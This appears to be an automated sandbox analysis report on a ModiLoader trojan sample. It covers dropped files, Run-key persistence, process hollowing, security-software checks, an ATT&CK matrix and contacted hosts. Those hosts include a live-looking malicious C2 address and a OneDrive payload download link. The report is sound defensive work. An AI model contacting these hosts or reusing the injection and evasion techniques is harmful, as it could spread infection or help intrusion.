Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041E7511 push 041E7576h; ret	0_2_041E756E
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041E7534 push 041E7576h; ret	0_2_041E756E
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0421B654 push ecx; mov dword ptr [esp], ecx	0_2_0421B658

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\veaiqniF.pif			Jump to dropped file
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\Finqiaev.PIF			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\veaiqniF.pif	Jump to dropped file
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\truesight.sys	Jump to dropped file
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\Finqiaev.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Finqiaev			Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Finqiaev			Jump to behavior

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0422224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_0422224C
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420AEA0 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_0420AEA0
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04221018 IsIconic,GetCapture,	0_2_04221018
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0423319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_0423319C
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0422FCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	0_2_0422FCD8
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_042338CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	0_2_042338CC
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04221920 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_04221920
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04233990 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	0_2_04233990
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040F224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	11_2_040F224C
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040F1018 IsIconic,GetCapture,	11_2_040F1018
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_0410319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	11_2_0410319C
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040FFCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	11_2_040FFCD8
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_041038CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	11_2_041038CC
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040F1920 IsIconic,SetWindowPos,GetWindowPlacement,	11_2_040F1920
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_04103990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	11_2_04103990

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_04238820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_04238820

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		0_2_0423245C
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		11_2_0410245C

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Dropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sys			Jump to dropped file
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe			Jump to dropped file

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	API coverage: 7.4 %
Source: C:\Users\Public\Libraries\Finqiaev.PIF	API coverage: 5.4 %

Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041E5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_041E5C18

Source: Finqiaev.PIF, 00000009.00000003.1622819787.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000648000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: veaiqniF.pif, 00000007.00000002.1792715961.000000002F6CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: veaiqniF.pif, 0000000A.00000002.1930922467.000000003B67C000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 0000000C.00000002.1972250429.000000002F84C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	API call chain: ExitProcess graph end node			graph_0-59083
Source: C:\Users\Public\Libraries\Finqiaev.PIF	API call chain: ExitProcess graph end node			graph_11-38449

Source: C:\Users\Public\Libraries\veaiqniF.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\veaiqniF.pif	Process queried: DebugPort

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041FFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_041FFCD8

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Memory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Memory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 17CB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Memory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Memory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 1DC10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Memory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Memory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 17CB0000 protect: page execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section unmapped: C:\Users\Public\Libraries\veaiqniF.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Section unmapped: C:\Users\Public\Libraries\veaiqniF.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Section unmapped: C:\Users\Public\Libraries\veaiqniF.pif base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Memory written: C:\Users\Public\Libraries\veaiqniF.pif base: 2EF008	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Memory written: C:\Users\Public\Libraries\veaiqniF.pif base: 2B5008	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Memory written: C:\Users\Public\Libraries\veaiqniF.pif base: 2F6008	Jump to behavior

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif	Jump to behavior

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_041E5DDC
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_041E5EE8
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: GetLocaleInfoA,	0_2_041EB8C4
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: GetLocaleInfoA,	0_2_041EB910
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_040B5DDC
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_040B5EE7
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: GetLocaleInfoA,	11_2_040BB910

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041EA30C GetLocalTime,

0_2_041EA30C

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_042495F8 GetVersion,

0_2_042495F8

Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: veaiqniF.pif, 00000007.00000003.1549405621.000000002F746000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1546571683.000000002F746000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1549854697.000000002F74B000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1547015188.000000002F74B000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1551595238.000000002F77D000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1551595238.000000002F782000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1548484853.000000002F74B000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1551845640.000000002F765000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000002.1793010187.000000002F765000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000002.1793394496.000000002F782000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1546456606.000000002F77D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: veaiqniF.pif, 0000000A.00000003.1737403086.000000003B6FF000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 0000000A.00000003.1737194626.000000003B6FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Valid Accounts	2 Obfuscated Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Valid Accounts	1 Access Token Manipulation	2 Software Packing	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	11 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	1 Windows Service	1 Timestomp	NTDS	25 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	311 Process Injection	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	111 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
qDKTsL1y44.exe	71%	ReversingLabs	Win32.Trojan.ModiLoader
qDKTsL1y44.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\netutils.dll	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Finqiaev.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Finqiaev.PIF	71%	ReversingLabs	Win32.Trojan.ModiLoader
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\netutils.dll	79%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Libraries\truesight.sys	8%	ReversingLabs
C:\Users\Public\Libraries\veaiqniF.pif	4%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://crl.microsoftq#	0%	Avira URL Cloud	safe
http://severdops.ddns.net:2024	100%	Avira URL Cloud	malware
http://www.pmail.com0	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0C	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dual-spov-0006.spov-msedge.net	13.107.137.11	true	false	unknown
ipinfo.io	34.117.186.192	true	false	high
checkip.us-east-1.prod.check-ip.aws.a2z.com	54.145.184.72	true	false	high
onedrive.live.com	unknown	unknown	false	high
checkip.amazonaws.com	unknown	unknown	false	high
6vq0og.dm.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://ipinfo.io/country	false	high
https://checkip.amazonaws.com/	false	high
https://onedrive.live.com/download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://6vq0og.dm.files.1drv.com/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRf0ha	Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://6vq0og.dm.files.1drv.com:443/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5W	Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmp	false		high
https://6vq0og.dm.files.1drv.com:443/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLR	Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
